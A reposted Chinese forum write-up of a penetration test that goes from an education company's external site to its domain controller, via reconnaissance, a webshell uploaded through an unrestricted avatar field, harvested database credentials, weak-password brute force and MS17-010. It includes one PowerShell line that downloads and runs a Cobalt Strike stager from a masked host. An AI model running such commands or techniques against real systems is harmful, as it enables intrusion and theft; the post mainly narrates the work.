找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2290|回复: 0
打印 上一主题 下一主题

渗透实战 | 从外网直接打到内网全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2024-3-1 19:41:32 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% J* g9 K- X( F1 Y0 _. w" ?4 H1 h8 m 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路8 R- [+ A0 i7 `! X9 r% f( {; L7 ]+ ]

, i5 W- w. m( i+ H

. J) r7 N8 R' R g5 U8 |  . m1 m6 ~) p* ?, m* D

( n$ S2 R8 T, _6 {

. E7 `& F8 H% b 正文 ! u' x9 c- ^# V: H8 O- M9 F

# r3 a4 m S9 J" D- E. j

; S( o5 _' C0 A( L   W0 M# ~1 Z# g+ S

4 L! @ Y# W- l1 `" _. k$ Q* w

! c9 [5 V8 `7 \7 _ 目标:www.xxxx.com(一家教育机构)
$ S0 R' ~9 A: N$ N0 `) `$ M( x
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
7 k6 |% @7 O+ F/ d5 `; _

' i+ I& p _, i% W7 v5 p) [

1 q) r0 H u( Z" S, l8 V vshapes= ' I R6 n, F& O* m4 V) A/ S

# g3 H3 \* ?5 \

6 l' x6 i1 L4 J( c 进行了简单的信息搜集
" e' h" w. A2 |
M2 W4 ^8 d3 g& q. e
' i7 N) |! I. b. i

4 w3 {; d; i4 \( C% o: R; n% \* o- C

7 c5 _: F; u% F 子域名搜集) ] \' M' [2 K: V$ _7 s

1 t& ]# W5 S/ B4 B# o3 ^5 ~3 e' C7 h1 Y

7 x( M' q1 F' f vshapes=+ @ k, E+ t( Z

4 s& B/ a* R; h

8 [0 H( B; k; A6 P fofa找资产
) d6 i2 }3 t3 c3 E' C/ \+ m
. L1 ~- U- w9 X& Q- f
0 o" p z0 f+ M% N, a2 W, Y

) I+ f) ?) {/ Q! E, Z# s( O

1 H. A& [8 }+ o: l, b vshapes= 4 n/ z; j) g7 v {- L

" f0 U/ e$ T( ?7 E' v) c

5 [3 |; d* [2 q6 j. @( f 一共七个资产。去重之后只有两个。
1 y! c1 K/ z: R
7 p9 d: n! A/ I! P- j
/ X( J8 w$ b" D( f5 k3 g6 W

! L& t: |. r8 R) c. t% V7 W

. L9 [0 g$ r, j1 }1 T 目录探测 # P* p) g' y3 }+ m/ d7 D. b

# a/ A( E" E1 K

1 {- O5 _& g# f0 g vshapes= - b% X1 K( t# x. b4 w2 ]4 h

+ G6 M$ h$ i1 @5 \; s' p$ M0 V

3 t3 W; c$ h1 ^$ y, o+ j 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
5 j( n; Y" l" |7 D( c
7 y9 N |4 O: h+ h) x! |
' l. g5 \: P9 _2 I0 E1 G5 ?

. t- J z7 ^% Q0 e& q

; p8 |7 [' X" k 我又尝试了通过修改返回包来绕过登录界面/ @7 j% ?, y# m" [: l

8 c( A* b1 r% D( u

& w& e# e- x5 d& M' G* [* o& e vshapes= V( B9 v# b+ V$ E' m/ R

k6 A7 s! c. [: e& B

% |6 v$ H: [$ s, N; L! v 还是不行,尝试注入无果1 u9 n0 F9 ?* b' }) K7 a/ c p

0 d" Y1 Z# X7 S9 a' h T

& z5 M1 Y6 _, w; A vshapes=; t' Q, m7 g+ \# t3 W R

& C7 U5 `/ p J

: o3 ]4 O5 y( ]& ~ 不过我目录探测出了一处Spring信息泄露
`' A4 X3 p" _8 v
; ?0 p$ A4 ]8 n$ M4 C3 a: F/ z
. P( p* P6 U9 B

% Y7 Y8 j. h I( D3 o

. g" E$ W" ~$ g& V vshapes=* u+ b1 }; f, Q6 H8 |

: S y/ ]% H- r0 p; Z3 Y9 x

1 H/ G: w$ D1 e2 z: e 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 G: S9 e( P6 J% s# ^3 [

7 s& E7 A1 C7 u, A! N( y

; h! M/ {' h) K7 C* ^$ _ vshapes=2 S9 D. \( ] H/ O+ E; y# h

- a5 ^5 ~ F$ _8 G" y# L

8 y3 L# A5 l7 V- I 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 , Q6 A2 @8 V1 F; H4 E3 x( D

3 t P1 b+ n ]7 Y9 l+ ^' q7 H

- b, }; z T/ h) s# Y- D vshapes= 4 o8 N$ m0 K0 D& q. }; S- k: P4 \

9 i V& c: T' m$ m

" C( B) I& s; \9 q 获取有些师傅到这一步就手机抓包电脑测了。5 O L1 Y) ?) d9 {

& b) t4 i! f3 c/ p" ?2 x) y

" Z/ u) f4 `7 B! a) z9 \; W7 ] Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 v, Z4 y) b' l7 ^; i

+ y6 ]1 g1 Y8 Z9 P7 ?/ s# M

4 q- L9 p" Z# T8 q. e. S/ ]8 ]) k 其中在一个公众号发现了小程序,可以进行注册。 ( p8 u; {8 {4 `+ P4 r, K

2 j0 [0 V& v1 A

. w& b2 k7 k/ J8 f: A 看到了头像上传,尝试上传获取WebShell & A" q5 d2 m9 E8 v- j

- a5 {1 D) h8 ]3 I3 v

& ^' @ o; r# c vshapes= . f/ y' j* }4 \ {$ i

- ]/ p! ?4 @9 {3 n

% _: Y; r& W; v n. [ 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问 W8 c4 n7 I4 o p

`6 w0 a4 f3 f- q( }5 _8 Y6 ^

- _5 T X6 l7 F. O3 I vshapes= % O! K1 U8 E% ` f

, X6 x/ g0 s9 }. b7 z

# _8 X5 L5 k# l; P 然后上了大马 ) e" m1 A; w: ~

) w' a! d: O1 l) ~/ [7 f/ T2 ^

: R8 U$ Q. V* I% @ vshapes= 7 G# p1 f4 ^% \& M$ w

. V: r3 H; O% A1 K! x8 K

! p L" B& K% T& P/ g( O& m( K vshapes=( M4 W4 F; A- V

T, J; Y: G3 R3 A8 S- `, N

! J' V1 e2 N2 ^% z9 e$ b9 y 通过翻找文件发现数据库账号密码 - ]' R+ L2 S: j

7 K, j: L1 X1 T3 i. a# J

* D9 y8 U3 T( m vshapes=) e2 A# v7 q2 Z7 i- o: \

; Q# ~) M. w' v5 a1 U

_9 d! K {# E3 P8 W6 k --内网渗透 . Q' F5 ^ A: O9 c

( x5 h4 h1 J- ~2 ?# o' [4 [8 d

0 _4 g$ x. I/ d8 }' C 直接通过powershell执行 cs上线 ( Y+ _! i I" h t: ]% I" |( V# a

Q; Y" y4 V2 z2 m. |

1 M* u6 l4 v6 A+ t) \# q$ Z powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"% H! ]: \1 q9 K4 @: t' U7 }; e

) M! H$ c5 R* Y d4 F

4 T$ u( j! W2 U' |* F' c vshapes= 2 p4 \! n$ c0 b; K5 f- m+ x& w

+ T! H- @$ h( [ G; c

) k& \3 R( p5 s% { 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 6 S9 N4 q) |5 Z7 E3 K1 ]

9 A. i- \+ F$ ?) m4 N( ~7 n6 i( ~8 t

! ^- }1 L+ G! J8 a" S# j+ h+ E vshapes=& c- R9 w0 w& A4 ?- F/ g

) ?$ ]* W7 T V' M5 ~

6 O3 |8 n+ C+ k8 w& q/ | 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
: J# I, A2 b" q3 c
+ T1 V; E9 M; n t7 F- t
1 }9 l6 k' |0 k6 Q
8 Z F6 b: M/ k4 C. T- Z

1 c7 `! ]1 `$ a- H, U

~# S3 ?: ~8 M! C" ~' U vshapes=9 t/ y2 T; C9 v

& y2 s9 F& }# k: d0 X

. W- u9 y' m9 C6 P1 X( v/ x4 Q+ m 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
`# l" M6 l# b
4 }. w9 H5 l- K
- `+ P8 g+ J2 p) i \. s

0 [$ C7 O# o9 f/ |

' a2 c* ]3 A& e$ J5 d vshapes=4 p# b% j9 ^$ r( ]' ]: O1 g

: U/ P. e, X: f

3 f& T7 t( L8 I4 _% @9 Z2 R
* G: w2 _3 V W' Z
% N; N* `! B" |6 I
$ q+ @4 L# ~5 D0 @6 l2 L

4 T$ { \$ ]9 X& I5 p

3 O3 M# Y* ]1 r0 M4 J+ y   + F! L! }( `( L1 B8 U

. C5 J# _" R* d6 h0 |2 y7 m. d

" }, ]3 | G( t3 E. w 小结 2 d/ h' d# P: H, Q1 {0 s) y

; t$ ], _" ]+ K+ n4 S& Z

8 p9 T" z& D$ r8 h! B0 M" X' ~   ! ~3 R: W! D/ e7 I D

2 v" Y& ]0 T% P+ Y/ _/ n. z

. O c: y1 Y% `9 e P4 C0 m3 A1 H$ [ 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! # d! J5 P6 N, k$ R/ O, f. l

! @/ u3 q/ k9 X' a3 H

3 k: s+ g( ]+ u8 ^7 I   , V( L1 r" I# l0 T2 K+ p

" k( Q$ s3 w4 z9 h/ F0 O
    , @) g! p) q5 T3 o; K
  • 7 Q) P- f6 _$ e+ U  ; Z! ^3 u" {0 X/ E3 o
  • ! |( ^8 T* W8 B8 j8 d& n
  • 0 l J$ q, F( I7 _- [9 B   0 P1 ~2 O) [! a1 ^$ t9 t
  • 5 ]# s2 d# x& Y6 z% V* t
+ F4 i9 K; q, c; T2 ~- g; e! d

2 r( l- Q9 ^, x5 d5 @1 [ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html2 ]3 N. ?) s% R. y3 k4 E& ?: S7 t) [9 G

8 s( A1 x7 R) X2 H. |

: A8 P* A+ r5 n9 u/ ~. F7 e3 u. t   3 F5 q$ X4 G9 \ O" u

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表